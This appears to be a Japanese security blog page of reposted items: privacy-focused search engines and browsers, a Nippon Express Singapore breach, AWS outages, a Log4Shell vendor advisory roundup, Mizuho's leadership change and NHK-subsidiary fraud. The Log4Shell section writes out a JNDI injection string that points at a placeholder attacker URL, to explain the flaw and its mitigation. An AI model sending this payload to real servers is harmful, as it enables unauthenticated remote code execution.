プライバシーとOSINTのための検索エンジンとブラウザの選択 / 30 search engine & browser choices for privacy and OSINT(転載)


 30 search engine & browser choices for privacy and OSINT

今回は、デジタル・プライバシーに焦点を当てます。私たちのオンライン活動の大部分は、ウェブブラウザや検索エンジンに依存しているため、ウェブブラウザや検索エンジンの話ほどぴったりなものはありません。

ここで、プライベートブラウジングに関する一般的な神話の1つである「Incognito / Private Browsing」モードについて説明します。

これらは全く持ってプライベートではありません。

どちらのモードであっても、お客様が閲覧するウェブサイトやアクセスするサービスは、お客様のIPアドレスを読み取り、お客様のブラウザのフィンガープリントを取得し、お客様のユーザーエージェントを認識します。

ウェブサイトからのマルウェアのドライブバイダウンロードなど、オンラインの脅威に対する保護機能は、通常のブラウジングモードと同様です。

最後に、あなたがオンラインで何をしているのか、ISPはまだ見ることができます。

以下に挙げる検索エンジンやブラウザは、必ずしもこれらの懸念事項のすべてに対応しているわけではありません。例えば、ISPのスヌーピングの問題は、VPNを使用することで解決する必要があります(その理由については、1年以上前に書きました)。

これらのあまり知られていないオプションを選択する際に重視したいのがプライバシーであろうとOSINTであろうと、以下の中から十分に選択することができます。

検索エンジン

アルファベット順に掲載されているので、良いもの、便利なものという意味では順不同です。

  • Brave Search – https://search.brave.com/ – 人気ブラウザ「Brave」と連動した、プライバシーに配慮した検索エンジンのベータ版です。
  • DuckDuckGo –  https://duckduckgo.com/ – おそらく、最もよく知られている、プライバシー重視の検索エンジンです。
  • Disconnect Search – https://search.disconnect.me/ – 透過的なプライバシーポリシーを持つDuckDuckGoが提供しています。
  • eTools CH – https://www.etools.ch/ – プライバシーを重視した検索エンジンのアグリゲーターで、現在17の検索エンジンが参加しています(その多くはこのリストに掲載されています)。
  • Gibiru – https://gibiru.com/ – アカウント不要、クッキー不要、検索ログ不要、閲覧履歴不要です。
  • Gigablast – https://www.gigablast.com/ – ニュース、画像、ディレクトリなどのプライベートサーチエンジン。
  • Intelligence X – https://intelx.io/ – 多目的でありながら、ウェブインフラからデータリークまで、あらゆる分野に特化した検索エンジンです。しかし、一般的なGoogleのような使い方には適していません。
  • Lukol – https://www.lukol.com/ – Googleカスタム検索による匿名での閲覧。Google検索を基本的なドライバーとして使用していますが、アカウントや登録は必要ありません。
  • MetaGer – https://metager.org/ – 非営利のNGOが運営する検索エンジン。複数の検索エンジンの結果を組み合わせることで、検閲から守ります。
  • Mojeek – https://www.mojeek.com/ – "escaping the big tech "の独立した検索エンジン。
  • Oscobo – https://www.oscobo.com/ – ユーザーの詳細情報を収集しない、専用のブラウザもあります。
  • Privado – https://www.privado.com/ – privacy focused search engine with a dedicated blog.
  • Private SH – https://private.sh/ – 暗号化された検索クエリとプロキシの使用により、プライバシーを実現しています。
  • Quant – https://www.qwant.com/ – EUベースの検索エンジンで、ユーザーの活動を追跡しません。広告は表示されるかもしれませんが、ランダムに表示されます。
  • Searchencrypt – https://www.searchencrypt.com/ – 15分後に閲覧履歴を削除します。
  • SearX – https://searx.space/ – オープンソースの検索エンジンで、ユーザーが作成したローカル検索エンジンのリストを提供し、どこで何がホストされているか、どのように運営されているかについての情報を提供します。
  • Startpage – https://www.startpage.com/ – トラッカーや広告ターゲティングをブロックし、ユーザーのIPアドレスをサーバーから削除する検索エンジンです。定期的に更新されるプライバシーブログを運営しています。
  • Swisscows – https://swisscows.com/ – プライバシーに配慮し、成人向けコンテンツをブロックするフィルターが組み込まれているため、家族に優しいことが特に強調されています。

ブラウザー

新しいブラウザを使い始める前に、そのプライバシー設定がどのようになっているかをテストしてみるのも良いでしょう。そのためには、次の2つのサイトをお勧めします。

ブラウザについては、Safari、Firefox、Chromeのようなわかりやすいものはあえて挙げていません(後者2つはOSINTに最適で、多数の便利な拡張機能があります)。

どのブラウザも同じではありませんが、以下のリストの多くは、特定の目的のために使用することができます。

  • Brave – https://brave.com/ – 非常に優れたプライバシー機能を備えたChromiumベースのブラウザで、ブラウザネイティブの暗号通貨ウォレットを内蔵した追加機能を備えています。
  • Epic Privacy Browser – https://www.epicbrowser.com/ – 印象的なプライバシー保護とセーフガードのリストを持つブラウザです
  • Freenet – https://freenetproject.org/pages/download.html – Webサイトやピアツーピアリソースの分散型ネットワークを閲覧するためのニッチなソフトウェア群であり、メインストリームのブラウザとは異なります。
  • Ghost Browser – https://ghostbrowser.com/  – 様々なブラウジングセッションのための複数のユーザーID、ワークスペースやプロキシを提供するブラウザです。無料版と有料版があります。
  • Opera – https://www.opera.com/ – チャット機能や無料のVPNサービスを内蔵した、プライバシーに配慮したブラウザです。
  • Oscobo – https://www.oscobo.com/ctnt.php?c=download – 上述の検索エンジン「Oscobo」のネイティブブラウザです。
  • Osirt Browser – https://osirtbrowser.com/ – 厳密にはOSINTに焦点を当てたブラウザで、自分の仕事を記録するためのものです。2022年には大幅なアップグレードが予定されており、さらに面白いものになるはずです。
  • Tor – https://www.torproject.org/download/ – デジタル・プライバシーに興味のある方には、ここで紹介する必要はありません。プライベートブラウジングの真の先駆者です。
  • Vivaldi – https://vivaldi.com/ – 分割画面のタブや内蔵メールクライアントなどの革新的な機能を備えた、プライバシー重視のブラウザです。
  • Waterfox – https://www.waterfox.net/ – 様々なChromeやFirefoxの拡張機能をサポートしているとのことですが、テレメトリやトラッキングはありません。
  • Yacy – https://yacy.net/demonstration_tutorial_screenshot/ – 厳密にはブラウザそのものではなく、ローカルで動作し、ユーザーが設定可能な検索エンジンです。多数のオプションが用意されているため、ブラウザのような感覚で使用することができます。

日本通運のシンガポール現地法人に不正アクセス、情報流出の可能性(転載)


[PDF] 当社シンガポール現地法人における IT システムへの不正アクセスによる情報流出の可能性ついて 日本通運株式会社
nittsu.co.jp/info/pdf/20211…

日本通運株式会社は2021年12月9日、同社のシンガポール現地法人のITシステムへの不正アクセスによる情報流出の可能性について発表した。

これは11月14日に、シンガポール現地法人で運用するサーバとパソコンの一部に外部から不正アクセスがあったことを確認し、その後、一部情報が外部に流出した可能性を確認したというもの。

シンガポール現地法人は現時点で、不正アクセスのあった機器のネットワークからの遮断や被害拡大防止のための初動措置を終え、、関係機関への報告を行っている。現在は外部の専門機関も起用し、障害の復旧及び影響を受けた可能性のある情報の特定を進めている。

なお、12月9日時点の調査では、日本を含む他の国や地域におけるシステムへの影響は確認されていない。

【悲報】AWS再び落ちる / AWS down again, outage impacts Twitch, Zoom, PSN, Hulu, others(転載)~クラウドを採用するということは、障害発生時に指をくわえて見守るしかないことを覚悟せよ~


AWS down again, outage impacts Twitch, Zoom, PSN, Hulu, others:

Amazon AWSで障害が発生し、Twitch、Zoom、PSN、Xbox Live、Doordash、Quickbooks Online、Huluなど、多数のオンラインサービスに影響が及んでいます。

AWSのステータスページによると、この継続的な障害は2021年12月15日午前7時43分(PST)頃に始まり、US-WEST-1およびUS-WEST-2リージョンに影響を及ぼしているとのことです。

報告によると、インターネット接続の大きな問題を引き起こし、オンラインプラットフォームやウェブサイトの長いリストをダウンさせています。

AWSのエンジニアは、この障害の背後にある根本的な原因への対処に取り組んでおり、すでに接続性を回復するための措置を講じたと述べています。

"我々はUS-WEST-2リージョンへのインターネット接続の根本原因を特定し、接続性を回復するための措置を講じました。"とAWSのステータスページには書かれています。

"ここ数分でインターネット接続に若干の改善が見られましたが、引き続き完全な復旧に向けて取り組んでいます。"

今回のAWS障害で影響を受けたオンラインサービス


その結果、Netflix、Roku、Amazon Primeでのストリーミング再生に直ちに影響が出ました。カメラに接続できなくなったというユーザーの報告によると、Ringデバイスもダウンし、アクセス不能になったとのことです。

アマゾンの配達員も、荷物のスキャンや配達ルートへのアクセス、今後のスケジュールの確認に必要な社内アプリにアクセスできなかったと述べています。

AWSが後に説明したように、そのインシデントは、"メインAWSネットワークでホストされているAWSサービスの1つの容量を拡張する自動化された活動 "が原因で、"内部ネットワークとメインAWSネットワーク間のネットワークデバイスを圧倒する大規模な接続活動のサージが発生した "ものでした。

これらの停止は、2020年11月にUS-EAST-1リージョンに影響を与えた大規模インシデントを含む、2011年以降の他の複数の同様のインシデントに続くものであるため、特別な出来事ではありません。

当時、ストリーミングデータをリアルタイムで処理するAmazonのKinesisサービスに問題が発生し始め、多数のサイトやオンラインプラットフォームがオフラインになりました。

その1年前の2019年9月には、AWSのノースバージニアUS-EAST-1データセンターを襲った停電により、ファイルを復元するためのバックアップが機能していなかったAmazonのすべての顧客がデータ損失を被った。

Javaのログ出力ライブラリ「Apache Log4j」に存在するリモートから悪用可能な脆弱性(CVE-2021-44228)


Log4j: List of vulnerable products and vendor advisories:

2021年12月9日、Apache Log4jのロギング・ライブラリに重大な脆弱性があるというニュースが流れ、概念実証済みの脆弱性が出現しはじめました。

Log4jは、オープンソースのJavaロギングフレームワークで、Apache Logging Servicesの一部として、世界中のベンダーの様々なアプリケーションでエンタープライズレベルで使用されています。

Apacheは、Log4ShellまたはLogJamとも呼ばれる、現在CVE-2021-44228として追跡されている最大深刻度の脆弱性に対処するために、Log4j 2.15.0をリリースしました。

CloudflareとCisco Talosのデータによると、大規模な悪用が始まったのは、悪用コードが自由に利用できるようになってからですが、今月初めから攻撃が検出されています。

Log4Shellの欠陥は、11月24日にAlibabaのクラウドセキュリティチームによって報告されましたが、一部の攻撃者がなぜこれほど早く悪用できたのかは不明です。

Cybersecurity and Infrastructure Security Agency(CISA)のディレクターであるJen Easterly氏は、Log4Shellの脆弱性に関する土曜日の声明で、同機関が民間および公的セクターのパートナーと協力してこの問題に対処していると述べています。

Log4Shell は、Java Naming and Directory Interface (JNDI) インジェクションで、認証されないリモートでのコード実行を可能にします。攻撃者は、ブラウザのユーザーエージェントを次の形式の文字列に変更することで、これを利用することができます。

${jndi:ldap://[attacker_URL]}

この文字列は、被害者のWebサーバーのログに残り、Log4jライブラリがそれを解析すると、攻撃者のURLへのコールバックやリクエストを強制的に実行します。攻撃者は、この文字列を使用して、脆弱なマシンにエンコードされたコマンドやJavaクラスを渡すことができます。


CISAは本日、脆弱性の深刻さとその悪用が容易であることから、Log4Shell攻撃に対する防御を設定するための企業向けガイダンスを発表しました。同機関が推奨するのは、「利用可能なパッチを直ちに適用すること」であり、このプロセスに優先順位をつけることです。

パッチ適用が不可能な場合、同機関は以下の変更を推奨しています。

アプリケーションを起動する Java Virtual Machine コマンドに -Dlog4j2.formatMsgNoLookups=True という文字列を追加して log4j2.formatMsgNoLookups を true に設定する。

この場合、メッセージのフォーマットをルックアップに依存している場合、システムのロギングに影響を与える可能性があるという注意点があります。また、この緩和策はバージョン2.10以降にのみ有効です。

Log4Shellの詳細が判明した直後から、ベンダー各社は自社製品が影響を受けるかどうかの調査を開始し、その結果について情報を提供しています。

Amazon

アマゾンは、いくつかの製品をアップデートし、脆弱性のないバージョンのLog4jコンポーネントを使用するようにし、他の製品もアップデート中であるか、近い将来に新しいバージョンをリリースする予定であると発表しました。

同社は、OpenSearch、AWS Glue、S3、CloudFront、AWS Greengrass、API Gatewayなどの影響を受けるサービスに関する詳細を発表している。

Atlassian

同社の評価によると、オンプレミス製品のデフォルト設定では、悪用されやすい脆弱性はないと考えています。

JMS Appender 機能を有効にするためにデフォルトのログ設定 (log4j.properties) を変更すると、Jira Server & Data Center, Confluence Server & Data Center, Bamboo Server & Data Center, Crowd Server & Data Center, Fisheye, Crucible など一部の製品でリモートコード実行のリスクがもたらされる可能性があるそうです。

Broadcom

同社は、Log4jの脆弱性の影響を受ける複数のシマンテック製品について、緩和策とナレッジベースの記事を公開しました。CA Advanced Authentication、Symantec SiteMinder (CA Single Sign-on)、VIP Authentication Hub、Symantec Endpoint Protection Manager (SEPM)が含まれる。

Cisco

シスコは、Log4Shellの影響を受ける自社製品のリストと、12月14日から一部の製品にパッチを適用するカレンダーを公開しました。

影響を受ける製品は、以下のような様々なカテゴリーに分類されます。
  • ネットワークおよびコンテンツセキュリティ機器(Identity Services Engine、Firepower Threat Defense、Advanced Web Security Reporting Application)
  • コラボレーションとソーシャルメディア(Cisco Webex Meetings Server)
  • ネットワーク管理およびプロビジョニング(Cisco CloudCenter Suite Admin、Data Center Network Manager、IoT Control Center、Network Services Orchestrator、WAN Automation Engine)
  • エンタープライズ ルーティングとスイッチング(Cisco Network Assurance Engine、Cisco SD-WAN vManage)
Citrix

調査は現在も進行中であり、一部の製品については状況が変わる可能性がありますが、シトリックスは、Log4Shellの脆弱性がある製品としてリストアップしていません。

ConnectWise

同社のクラウドサービスであるPerchが、「潜在的な脆弱性を持つ」サードパーティーコンポーネントに依存していることが判明した、とConnectWise社のアドバイザリーには書かれています。

脆弱性のあるサードパーティは、ConnectWiseのStratoZenソリューションで使用されているFortiGuardのFortiSIEMと判明し、同社はホスティングされているStratoZenサーバーへのアクセスを一時的に制限するよう促されました。現在では、ほとんどのサービスへのアクセスが回復しています。

cPanel

フォーラムのスレッドによると、cPanelのSolrプラグインが存在するインスタンスのみが影響を受け、悪用される可能性があるが、ローカルにのみ存在するとのことです。

あるスタッフは、Log4Shellに対する緩和策を含むアップデートがcpanel-dovecot-solrパッケージに用意されていることを発表し、さらに安心感を与えてくれました。

Debian

Debian 9 (Stretch), 10 (Buster), 11 (Bullseye), 12 (Bookworm) にセキュリティアップデートとして、パッチを適用した Log4j パッケージが追加されました、と勧告があります。

Docker

Docker Officialイメージの12個に、脆弱性のあるバージョンのLog4jライブラリが使用されていることが判明しています。couchbase、elasticsearch、logstash、sonarqube、solrが含まれる。

Dockerは、「これらのイメージに含まれるLog4j 2を利用可能な最新バージョンに更新中」であり、他の理由でイメージに脆弱性がない可能性があると述べている。

FortiGuard

同社からのアドバイザリーでは、約12の同社製品に脆弱性があるとされており、そのうち4つの製品についてはすでに修正または緩和措置が展開されているとのことです。

FortiGuardは、FortiSIEM、FortiInsight、FortiMonitor、FortiPortal、FortiPolicy、ShieldXなど他の製品の修正プログラム適用時期について、アドバイザリを更新すると発表している。

F-Secure

エフセキュアのいくつかの製品のWindows版とLinux版の両方がLog4Shellの影響を受けています。Policy Manager (Policy Manager Server コンポーネントのみ)、Policy Manager Proxy、Endpoint Proxy、および Elements Connector です。

同社は、この問題を修正するための管理者向けセキュリティパッチを作成し、それを展開するためのステップバイステップの手順を提供しています。

Ghidra

NSAが提供するオープンソースのリバースエンジニアリングツールは、バージョン10.1へのアップデートを受け、Log4jの依存関係を脆弱性のないイテレーションにアップグレードしています。

IBM

IBMのLog4Shellに関するアドバイザリによると、Admin ConsoleとUDDI Registry Applicationコンポーネント経由で、WebSphere Application Serverバージョン9.0と8.5のみが脆弱性の影響を受け、この問題は解決されているとのことです。

Juniper Networks

ネットワーク会社は、同社の4つの製品が影響を受けることを明らかにした。Paragon Active Assurance、Paragon Insights、Paragon Pathfinder、Paragon Plannerの4製品に影響があることを明らかにしました。

評価は継続中ですが、現段階ではさらに6つの製品が影響を受ける可能性があります。JSAシリーズ、Junos Space Management Applications、Junos Space Network Management Platform、Network Director、Secure Analytics、Security Director (Security Director Insightsは除く)

McAfee

同社はまだ評価を完了しておらず、12製品を審査中であり、関連情報が入手でき次第、アドバイザリーを更新する予定です。

MongoDB

Log4Shellに対してパッチを適用する必要があるのはMongoDB Atlas Searchのみであると、本日更新されたアドバイザリーで同社は指摘しています。

開発元は、パッチを適用する前に悪用された証拠や侵害の指標を発見しなかったと付け加えています。

Okta

Oktaは、Log4Shellの脆弱性によるリスクを軽減するため、Okta RADIUS Server AgentおよびOkta On-Prem MFA Agentのアップデートをリリースし、お客様にアドミンコンソールからの修正プログラムの適用を強く推奨しています。

Oracle

オラクルによると、「いくつかの」自社製品が、どの製品が、いくつの製品が、脆弱性のあるバージョンのLog4jコンポーネントを使用していると公表していない。

同社は、顧客にMy Oracle Support Documentを紹介し、提供されるアップデートを "できるだけ早く "適用するよう強く推奨するセキュリティ警告を発表した。

OWASP Foundation

先日のアドバイザリで、Zed Attack Proxy (ZAP) ウェブアプリのスキャナ 2.11.1 以下のバージョンに、脆弱な Log4j コンポーネントが使用されていることが明らかになりました。

Red Hat

Red Hat は、複数の Red Hat 製品のコンポーネントが Log4Shell の影響を受けることを金曜日に明らかにし、利用可能になり次第、アップデートを適用するよう顧客に強く推奨しています。

勧告に記載されている製品は、Red Hat OpenShift 4および3.11、OpenShift Logging、OpenStack Platform 13、CodeReady Studio 12、Data Grid 8、Red Hat Fuse 7である。

AWSで障害、多数のウェブサイトやアプリに影響(転載)~クラウドを採用するということは、障害発生時に指をくわえて見守るしかないことを覚悟せよ~


アマゾンで障害、多数のウェブサイトやアプリに影響:

Amazon Web Services(AWS)で米国時間2021年12月7日に障害が発生し、複数のウェブサイトやアプリを一部のユーザーが利用できない状態になった。AWSでは、「Disney+」「Robinhood」「Barclays」「Slack」などのサービスに処理能力やストレージを提供している。今回の障害では、ワシントンDCやニューヨーク市を含む米国東海岸の地域に障害発生の報告が集中していた。

障害に関するデータを収集するDown Detectorには、7日の米国東部時間正午前の時間帯に、AWSを利用するサイトの障害報告が1万1000件以上まで急増している様子が示されている。

システムアクティビティーをモニタリングするためのAWSのステータスページには、同社のバージニアにある施設で発生した問題がUS-EAST-1リージョンに影響を与えていると記載されている。その問題は、企業がウェブサイトやアプリを運用するために使用する、複数のAWS製品に影響を与えたようだ。

「根本原因を特定済みで、復旧に向けて鋭意対応している」と更新情報には記されている。

Down Detectorには、数十件のサービスの障害報告も示されているが、そのすべてがAWSの障害が始まった時間から発生している。Amazonそのものに加えて、傘下のサービスである「Ring」「Prime Music」「Alexa」「Chime」や、TicketMaster、Google、McDonald's、Venmo、Cash App、そして米社会保障局のオンラインアカウント用ポータルであるMy Social Securityなども、7日の午前11時頃から障害に見舞われている。

ー2021/12/15追記ー

AWS、12月7日の大規模障害について詳細を報告アーカイブ

みずほFG システム障害頻発で首脳陣一新・・・(転載)~ITを理解できない人が会社を経営するとこうなる~

みずほFG システム障害頻発で首脳陣一新…ついに消滅した「興銀の栄光」

官界通(以下=官):みずほフィナンシャルグループ(FG)の佐藤康博会長(69)と坂井辰史社長(62)が、度重なるシステム障害で利用者に不便と不安を与えた責任で、ようやく辞任を決めたな。2人はみずほの母体の一つ、旧・日本興業銀行の出身。ある興銀OBが「これで、栄光の興銀の歴史は終わる」と嘆いていた。

政界通(同=政):責任は明確だったのに、なぜ体制一新が遅れたの?

財界通(同=財):2人に「辞任は当然」とする一般の感覚が欠けていたからだろう。

官:興銀出身という点が、関係しているのか?

財:そうだと思う。興銀は明治時代に産業振興のために設立された国策銀行で、債券を発行して得た資金で融資を拡大。とくに鉄鋼、造船、化学、電力など巨大な装置を必要とする重工業の発展に貢献した。戦後も金融債の「ワリコー」「リッキー」が富裕層の人気を集め、2002年4月に経営統合でみずほコーポレート銀行に衣替えするまで存在感を維持した。

官:そう、「財界の鞍馬天狗」の異名を持つ中山素平氏をはじめ歴代頭取は、海外や財界でも活躍した。

政:それに比べ、佐藤氏や坂井氏は小粒で、巨大銀行の舵取りを誤ったということか。

■リテールのあるメガのトップは無理だった

財:そこまでは言わないが、大企業金融の世界で育った人が膨大な個人や中小零細の業者をお客に持つメガバンクグループのトップを務めることに、無理があった。数字優先で、統合の相手だった富士銀行系や第一勧業銀行系の支店を減らし、システム要員らの削減へ猛進した。

政:それが、障害頻発の遠因か。

官:金融庁が出した業務改善命令にも、その視点がある。

財:辞任は2人だけでなく、傘下のみずほ銀行の藤原弘治頭取(60)も辞める。ただ、藤原氏の後任は富士出身の加藤勝彦副頭取(56)に決まったが、FGトップは未定だ。

官:金融庁の雰囲気では、興銀出身者が3代続けて就任する可能性はないな。

財:当然だ。今回だけでなく、もう二度とないかもしれない。


【参考】

みずほ銀行及びみずほフィナンシャルグループに対する行政処分について (バックアップ


CSIRTマテリアル(構想フェーズ・構築フェーズ・運用フェーズ)リニューアル



hiro_ retweeted:
CSIRTマテリアル(構想フェーズ・構築フェーズ・運用フェーズ)を更新しました。どうぞご利用ください。^YK jpcert.or.jp/csirt_material…


CSIRT(シーサート: Computer Security Incident Response Team) とは、組織内の情報セキュリティ問題を専門に扱う、インシデント対応チームです。

近年の組織 (企業) の IT 利用の拡大に伴い、情報セキュリティ対策は組織にとって重要な問題となってきています。高度に複雑化し、かつインターネットを介して大容量のデータを瞬時に、しかも容易に世界中とやり取りできる IT システムの利用が一般的になったことで、単に「現場 = システム管理者」の頑張りだけで済む問題ではなくなってきています。例えば、情報システムがコンピューターウイルスに感染してしまったために、顧客の個人情報が世界中にばら撒かれてしまったといった事態を考えてみれば、情報セキュリティの問題が、もはやシステム管理者だけの問題ではなく、経営層が積極的に関与しなければならない問題であることは容易に想像できると思います。このような中で、組織の情報セキュリティ対策として注目されているのが、情報セキュリティの問題を専門に、ただし組織全体の視点から取り扱うCSIRTの構築です。

CSIRTマテリアルは、組織的なインシデント対応体制である「組織内CSIRT」の構築を支援する目的で作成したものです。これから自組織内にCSIRTを構築しようと考えている組織の方が、それまでのインシデント対応経験をもとに、既存の体制を整理したり、見直したりしてCSIRTの構築に繋げる際の参考として頂くことを意図しています。一連の資料では組織内CSIRTが一般的に備えるべき機能や能力等について説明していますが、すべての組織内CSIRTがそれらを達成しなければならないというものではありません。それぞれの組織の状況に応じた適切なCSIRTの形があり、本資料がそれを見つける際の助けとなれば幸いです。


NHK子会社社員を懲戒解雇 2,800万円分チケット換金、私的流用(転載)~経理担当が裏切らないとは限らない。内部不正対策の観点からもゼロトラストの発想が必要~

経理担当が裏切らないとは限らない

NHK子会社社員を懲戒解雇 2800万円分チケット換金、私的流用

仕事で使うと装って旅行会社から新幹線のチケット約2,800万円分をだまし取り、現金化して私的に使ったとして、NHKの子会社NHKグローバルメディアサービスは2021年12月10日、40代の男性社員を懲戒解雇にし、発表した。

同社によると、社員は2021年7月~10月、取引先プロダクションの架空の出張名目で85件約2800万円分のチケットを旅行会社から受け取り、JRの窓口で払い戻して、自身のローンの返済などにあてていたという。代金は未払いで、グローバル社が弁済した。

2017年から今年7月までに同様の方法で購入、現金化したチケットは計約1億5千万円分にのぼり、代金は新たなチケットの払い戻しなどで支払ってきたといい、今回の未払い分も「いずれは返すつもりだった」と話しているという。

同社は告発などについて警察と相談しているといい「あるまじき行為であり、深くおわびいたします。再発防止に向けて全社的な取り組みを徹底してまいります」とのコメントを出した。